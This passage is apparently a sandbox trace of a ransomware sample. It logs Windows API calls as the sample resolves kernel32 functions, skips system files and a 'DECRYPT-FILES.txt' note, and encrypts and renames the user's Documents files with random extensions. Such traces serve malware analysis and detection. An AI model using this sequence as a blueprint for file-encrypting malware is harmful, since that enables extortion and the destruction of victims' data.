returned="CreateTimerQueue" [0084.892] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0084.892] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0084.892] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0084.892] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0084.892] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0084.892] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0084.892] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0084.892] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0084.892] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0084.892] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0084.892] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0084.892] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0084.892] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0084.892] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0084.892] lstrlenA (lpString="CTRLROUTINE") returned 11 [0084.892] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0084.892] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0084.893] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0084.893] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0084.893] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0084.893] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0084.893] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0084.893] lstrlenA (lpString="DEBUGBREAK") returned 10 [0084.893] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0084.893] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0084.893] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0084.893] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0084.893] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0084.893] lstrlenA (lpString="DECODEPOINTER") returned 13 [0084.893] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0084.893] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0084.893] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0084.893] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0084.893] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0084.893] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0084.893] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0084.893] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0084.893] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0084.893] lstrlenA (lpString="DELETEATOM") returned 10 [0084.893] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0084.893] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0084.893] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0084.893] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0084.893] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0084.893] lstrlenA (lpString="DELETEFIBER") returned 11 [0084.893] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0084.893] lstrlenA (lpString="DELETEFILEA") returned 11 [0084.893] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0084.893] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0084.893] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0084.893] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0084.893] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0084.893] lstrlenA (lpString="DELETEFILEW") returned 11 [0084.893] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0084.894] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0084.894] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0084.894] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0084.894] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0084.894] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0084.894] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0084.894] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0084.894] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0084.894] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0084.894] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0084.894] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0084.894] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0084.894] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0084.894] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0084.894] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0084.894] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0084.894] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0084.894] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0084.894] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0084.894] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0084.894] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0084.894] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0084.894] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0084.894] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0084.894] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0084.894] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0084.894] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0084.894] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0084.894] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0084.894] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0084.894] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0084.894] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0084.894] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0084.894] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0084.894] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0084.894] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0084.894] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0084.894] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0084.895] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0084.895] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0084.895] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0084.895] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0084.895] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0084.895] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0084.895] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0084.895] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0084.895] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0084.895] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0084.895] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0084.895] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0084.895] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0084.895] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0084.895] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0084.895] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0084.895] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0084.895] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0084.895] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0084.895] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0084.895] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0084.895] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0084.895] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0084.895] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0084.895] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0084.895] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0084.895] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0084.895] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0084.895] lstrcpyW (in: lpString1=0xfb0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0084.896] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vpMMF.odp") returned 49 [0084.896] wsprintfW (in: param_1=0x3f2e120, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vpMMF.odp.ouLWSnE") returned 57 [0084.896] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vpMMF.odp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\vpmmf.odp"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vpMMF.odp.ouLWSnE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\vpmmf.odp.oulwsne"), dwFlags=0x0) returned 1 [0084.896] VirtualFree (lpAddress=0xfa0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.897] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.897] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.897] FindNextFileW (in: hFindFile=0x5f8b98, lpFindFileData=0x3f2f150 | out: lpFindFileData=0x3f2f150*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x769449b0, ftCreationTime.dwHighDateTime=0x1d52c16, ftLastAccessTime.dwLowDateTime=0x2bf065f0, ftLastAccessTime.dwHighDateTime=0x1d553c7, ftLastWriteTime.dwLowDateTime=0x2bf065f0, ftLastWriteTime.dwHighDateTime=0x1d553c7, nFileSizeHigh=0x0, nFileSizeLow=0x50b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="WeBMl2HUYIyd3QDBr1.xlsx", cAlternateFileName="WEBML2~1.XLS")) returned 1 [0084.897] lstrcmpiW (lpString1="WeBMl2HUYIyd3QDBr1.xlsx", lpString2="DECRYPT-FILES.txt") returned 1 [0084.897] lstrcmpiW (lpString1="WeBMl2HUYIyd3QDBr1.xlsx", lpString2="autorun.inf") returned 1 [0084.897] lstrcmpiW (lpString1="WeBMl2HUYIyd3QDBr1.xlsx", lpString2="boot.ini") returned 1 [0084.897] lstrcmpiW (lpString1="WeBMl2HUYIyd3QDBr1.xlsx", lpString2="desktop.ini") returned 1 [0084.897] lstrcmpiW (lpString1="WeBMl2HUYIyd3QDBr1.xlsx", lpString2="ntuser.dat") returned 1 [0084.897] lstrcmpiW (lpString1="WeBMl2HUYIyd3QDBr1.xlsx", lpString2="iconcache.db") returned 1 [0084.897] lstrcmpiW (lpString1="WeBMl2HUYIyd3QDBr1.xlsx", lpString2="bootsect.bak") returned 1 [0084.897] lstrcmpiW (lpString1="WeBMl2HUYIyd3QDBr1.xlsx", lpString2="ntuser.dat.log") returned 1 [0084.897] lstrcmpiW (lpString1="WeBMl2HUYIyd3QDBr1.xlsx", lpString2="thumbs.db") returned 1 [0084.897] lstrcmpiW (lpString1="WeBMl2HUYIyd3QDBr1.xlsx", lpString2="Bootfont.bin") returned 1 [0084.897] lstrlenW (lpString="WeBMl2HUYIyd3QDBr1.xlsx") returned 23 [0084.897] lstrcmpiW (lpString1="xlsx", lpString2="lnk") returned 1 [0084.897] lstrcmpiW (lpString1="xlsx", lpString2="exe") returned 1 [0084.897] lstrcmpiW (lpString1="xlsx", lpString2="sys") returned 1 [0084.897] lstrcmpiW (lpString1="xlsx", lpString2="dll") returned 1 [0084.897] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned 40 [0084.897] lstrlenW (lpString="WeBMl2HUYIyd3QDBr1.xlsx") returned 23 [0084.897] lstrcpyW (in: lpString1=0x3f2e920, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0084.898] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpString2="WeBMl2HUYIyd3QDBr1.xlsx" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WeBMl2HUYIyd3QDBr1.xlsx") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WeBMl2HUYIyd3QDBr1.xlsx" [0084.898] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0084.898] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WeBMl2HUYIyd3QDBr1.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\webml2huyiyd3qdbr1.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x410 [0084.898] GetFileSizeEx (in: hFile=0x410, lpFileSize=0x3f2e0e8 | out: lpFileSize=0x3f2e0e8*=1291) returned 1 [0084.898] CreateFileMappingW (hFile=0x410, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x414 [0084.898] MapViewOfFile (hFileMappingObject=0x414, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfa0000 [0084.898] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xf90000 | out: pbBuffer=0xf90000) returned 1 [0084.898] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xf90020 | out: pbBuffer=0xf90020) returned 1 [0084.898] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0084.899] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfb0000*, pdwDataLen=0x3f2e050*=0x28, dwBufLen=0x100 | out: pbData=0xfb0000*, pdwDataLen=0x3f2e050*=0x100) returned 1 [0084.899] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0084.899] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.899] UnmapViewOfFile (lpBaseAddress=0xfa0000) returned 1 [0084.900] CloseHandle (hObject=0x414) returned 1 [0084.900] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.900] WriteFile (in: hFile=0x410, lpBuffer=0xfb0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2e070, lpOverlapped=0x0 | out: lpBuffer=0xfb0000*, lpNumberOfBytesWritten=0x3f2e070*=0x108, lpOverlapped=0x0) returned 1 [0084.901] CloseHandle (hObject=0x0) returned 0 [0084.901] CloseHandle (hObject=0x410) returned 1 [0084.901] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.901] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.901] GetTickCount () returned 0x114daf4 [0084.901] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0084.902] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0084.902] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0xfa0000 [0084.902] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0084.902] lstrcpyW (in: lpString1=0xfb0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0084.902] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WeBMl2HUYIyd3QDBr1.xlsx") returned 63 [0084.902] wsprintfW (in: param_1=0x3f2e120, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WeBMl2HUYIyd3QDBr1.xlsx.98Nx") returned 68 [0084.902] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WeBMl2HUYIyd3QDBr1.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\webml2huyiyd3qdbr1.xlsx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WeBMl2HUYIyd3QDBr1.xlsx.98Nx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\webml2huyiyd3qdbr1.xlsx.98nx"), dwFlags=0x0) returned 1 [0084.903] VirtualFree (lpAddress=0xfa0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.904] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.904] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.904] FindNextFileW (in: hFindFile=0x5f8b98, lpFindFileData=0x3f2f150 | out: lpFindFileData=0x3f2f150*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb658cc20, ftCreationTime.dwHighDateTime=0x1d57ce7, ftLastAccessTime.dwLowDateTime=0xbee94490, ftLastAccessTime.dwHighDateTime=0x1d53990, ftLastWriteTime.dwLowDateTime=0xbee94490, ftLastWriteTime.dwHighDateTime=0x1d53990, nFileSizeHigh=0x0, nFileSizeLow=0x11af9, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="XGeoDXeT30sbcoQN.xlsx", cAlternateFileName="XGEODX~1.XLS")) returned 1 [0084.904] lstrcmpiW (lpString1="XGeoDXeT30sbcoQN.xlsx", lpString2="DECRYPT-FILES.txt") returned 1 [0084.904] lstrcmpiW (lpString1="XGeoDXeT30sbcoQN.xlsx", lpString2="autorun.inf") returned 1 [0084.904] lstrcmpiW (lpString1="XGeoDXeT30sbcoQN.xlsx", lpString2="boot.ini") returned 1 [0084.904] lstrcmpiW (lpString1="XGeoDXeT30sbcoQN.xlsx", lpString2="desktop.ini") returned 1 [0084.904] lstrcmpiW (lpString1="XGeoDXeT30sbcoQN.xlsx", lpString2="ntuser.dat") returned 1 [0084.904] lstrcmpiW (lpString1="XGeoDXeT30sbcoQN.xlsx", lpString2="iconcache.db") returned 1 [0084.904] lstrcmpiW (lpString1="XGeoDXeT30sbcoQN.xlsx", lpString2="bootsect.bak") returned 1 [0084.904] lstrcmpiW (lpString1="XGeoDXeT30sbcoQN.xlsx", lpString2="ntuser.dat.log") returned 1 [0084.904] lstrcmpiW (lpString1="XGeoDXeT30sbcoQN.xlsx", lpString2="thumbs.db") returned 1 [0084.904] lstrcmpiW (lpString1="XGeoDXeT30sbcoQN.xlsx", lpString2="Bootfont.bin") returned 1 [0084.904] lstrlenW (lpString="XGeoDXeT30sbcoQN.xlsx") returned 21 [0084.904] lstrcmpiW (lpString1="xlsx", lpString2="lnk") returned 1 [0084.904] lstrcmpiW (lpString1="xlsx", lpString2="exe") returned 1 [0084.904] lstrcmpiW (lpString1="xlsx", lpString2="sys") returned 1 [0084.905] lstrcmpiW (lpString1="xlsx", lpString2="dll") returned 1 [0084.905] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned 40 [0084.905] lstrlenW (lpString="XGeoDXeT30sbcoQN.xlsx") returned 21 [0084.905] lstrcpyW (in: lpString1=0x3f2e920, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0084.905] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpString2="XGeoDXeT30sbcoQN.xlsx" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\XGeoDXeT30sbcoQN.xlsx") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\XGeoDXeT30sbcoQN.xlsx" [0084.905] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0084.905] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\XGeoDXeT30sbcoQN.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\xgeodxet30sbcoqn.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x410 [0084.905] GetFileSizeEx (in: hFile=0x410, lpFileSize=0x3f2e0e8 | out: lpFileSize=0x3f2e0e8*=72441) returned 1 [0084.905] CreateFileMappingW (hFile=0x410, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x414 [0084.905] MapViewOfFile (hFileMappingObject=0x414, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfa0000 [0084.905] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xf90000 | out: pbBuffer=0xf90000) returned 1 [0084.905] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xf90020 | out: pbBuffer=0xf90020) returned 1 [0084.906] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0084.906] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfc0000*, pdwDataLen=0x3f2e050*=0x28, dwBufLen=0x100 | out: pbData=0xfc0000*, pdwDataLen=0x3f2e050*=0x100) returned 1 [0084.906] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0084.909] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.910] UnmapViewOfFile (lpBaseAddress=0xfa0000) returned 1 [0084.910] CloseHandle (hObject=0x414) returned 1 [0084.910] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.911] WriteFile (in: hFile=0x410, lpBuffer=0xfc0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2e070, lpOverlapped=0x0 | out: lpBuffer=0xfc0000*, lpNumberOfBytesWritten=0x3f2e070*=0x108, lpOverlapped=0x0) returned 1 [0084.911] CloseHandle (hObject=0x0) returned 0 [0084.911] CloseHandle (hObject=0x410) returned 1 [0084.911] 